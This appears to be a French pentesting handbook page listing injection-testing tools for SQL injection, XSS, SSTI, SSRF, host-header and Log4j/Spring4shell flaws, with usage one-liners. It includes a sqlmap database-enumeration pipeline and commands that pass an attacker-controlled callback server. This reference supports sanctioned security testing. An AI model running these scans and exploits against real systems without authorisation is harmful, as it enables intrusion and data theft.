💉Injections
Outils dédiés aux injections de code
Sites:
https://xsshunter.trufflesecurity.com/app/#/: Serveur dédié aux blind xss.
https://requestbin.com/: Cela vous créer un domaine en m.pipedream.net puis vous permet d'analyser les requêtes http qui lui sont envoyées.
https://websec.ca/kb/sql_injection: Doc complète sur les injections SQL.
Injection de code
Commix :
Commix est un outil permettant de scanner et exploiter automatiquement les failles d'injection de code.
Exemple d'utilisation:
$ commix -u https://target.com/
ressource: https://github.com/commixproject/commix
Injections SQL
Sqlmap :
Sqlmap est un outil permettant de scanner et exploiter automatiquement les failles d'injection SQL.
Exemple d'utilisation:
$ sqlmap -u http://target.com/
ressource: https://github.com/sqlmapproject/sqlmap
Bug bounty tips:
$sublist3r -d target.com | tee -a subdomains.txt
cat subdomains.txt | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls.txt
gf sqli urls.txt >> possible_sqli.txt
sqlmap -m sqli.txt --dbs --batch
Ghauri:
Ghauri est un outil semblable à Sqlmap pouvant parfois compléter ses résultats et inversement.
Exemple d'utilisation:
$ ghauri -u https://target.com/exemple?id=1 --dbs
ressource: https://github.com/r0oth3x49/ghauri
Atlas:
Atlas est un outil semblable à Sqlmap conçu soécialement pour contourner les filtres et WAF.
ressource: https://github.com/m4ll0k/Atlas
HBSQLI:
HBSQLI est un outil de détection et d'exploitation d'injection SQL dédié spécifiquement aux en-têtes HTTP:
Exemple d'utilisation:
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
ressource: https://github.com/SAPT01/HBSQLI
XSS :
DalFox:
DalFox est un puissant outil d'analyse XSS open source, un analyseur de paramètres et un utilitaire qui accélère le processus de détection et de vérification des failles XSS.
Exemple d'utilisation:
$ dalfox url https://target.com/xxx -b https://hawul.xss.ht
ressource: https://github.com/hahwul/dalfox
Airixss:
Airixss sert à détecter d'éventuels endpoints vulnérables aux XSS durant la phase de reconnaissance.
Exemple d'utilisation:
$ cat endpoints.txt | airixss -payload "alert(1)"
ressource: https://github.com/ferreiraklet/airixss
XSpear :
Xspear est un scanner de faille XSS.
Exemple d'utilisation:
$ xspear -u "https://target.com/index.php?id=123" -v 1
ressource: https://github.com/hahwul/XSpear
XSStrike :
XSStrike est également un scanner de faille XSS.
Exemple d'utilisation:
$ python3 xsstrike.py -u https://target.com/index.php?id=123
ressource: https://github.com/s0md3v/XSStrike
Kxss
Kxss est un outil permettant de tester les paramètres d'une liste d'endpoints pour en ressortir les caractères qui sont ou non filtrés dans le but de trouver de potentielles failles XSS, c'est au pentester ensuite de tester manuellement le paramètre pour vérifier s'il est bien vulnérable.
exemple d'utilisation:
$ echo 'http://target.com/?name=Mathis&age=20' | kxss
ressource: https://github.com/tomnomnom/hacks/tree/master/kxss
Extension Dom invader de Burp Suite :
L'extension Dom invader de Burp Suite permet de tester la reflexion d'un "canary" lors de la navigation sur un site web afin de trouver des failles de type DOM XSS.
ressource: https://portswigger.net/burp/documentation/desktop/tools/dom-invader
SSTI :
Tplmap :
Tplmap est un outil qui permet de scanner et exploiter les failles SSTI.
Exemple d'utilisation:
$ ./tplmap -u https://target.com/
ressource: https://github.com/epinna/tplmap
SSRF :
SSRFire :
Un scanner de SSRF automatisé. Donnez simplement le nom de domaine cible et votre serveur et détendez-vous ! ;) A également des options pour trouver des XSS et redirections ouvertes.
Exemple d'utilisation:
$ ./ssrfire.sh -d target.com -s attackerserver -c cookie
ressource: https://github.com/ksharinarayanan/SSRFire
Host header
HostPanic
HostPanic est un outil de piratage permettant de rechercher des injections d'host header.
Exemple d'utilisation:
$ python3 main.py -u https://target.com/ -v
ressource: https://github.com/mr-medi/HostPanic
Log4j
Log4j-scan
Log4j-scan est un scanner de vulnérabilité pour log4j.
Exemple d'utilisation:
$ python3 log4j-scan.py -u https://target.com/
ressource: https://github.com/fullhunt/log4j-scan
Spring4shell-scan
Spring4shell-scan est un scanner de vulnérabilité spring4shell.
Exemple d'utilisation:
$ python3 spring4shell-scan.py -u https://target.com/
ressource: https://github.com/fullhunt/spring4shell-scan
Extension Burp suite Hack Bar
L'extension Hack Bar de Burp suite permet de coller des payloads de toutes sortes directement dans l'onglet repeater afin de gagner du temps sur l'écriture de ceux-ci.
Dernière mise à jour